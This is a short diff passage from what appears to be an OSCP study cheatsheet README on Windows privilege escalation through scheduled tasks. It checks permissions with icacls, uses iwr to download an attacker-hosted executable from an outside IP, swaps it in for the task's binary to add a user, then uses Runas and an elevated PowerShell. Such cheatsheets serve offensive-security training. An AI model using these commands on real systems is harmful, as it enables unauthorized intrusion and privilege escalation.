Kevinolinn8/OSCP-Cheatsheet/README.md

 #Permission check - Writable means exploitable!
 icalcs "path"
 #Wait till the scheduled task in executed, then we'll get a shell

+#example of overwriting a scheduled task (we can also do this with a rev shell from MSFvenom)
+iwr -uri http://192.168.45.215:8000/adduser.exe -outfile backup.exe #download the file to victim machine C:\TEMP\backup.exe backup.exe.bak #move the old executable move .\backup.exe C:\TEMP\ #move our shell to the location of the executable net user #wait and check if the user was added!!!
+Runas /user:dave2 cmd #run RunAs to switch users powershell -Command "Start-Process cmd -Verb Runas" #once logged in get a powershell instance

 ```

 ## Startup Apps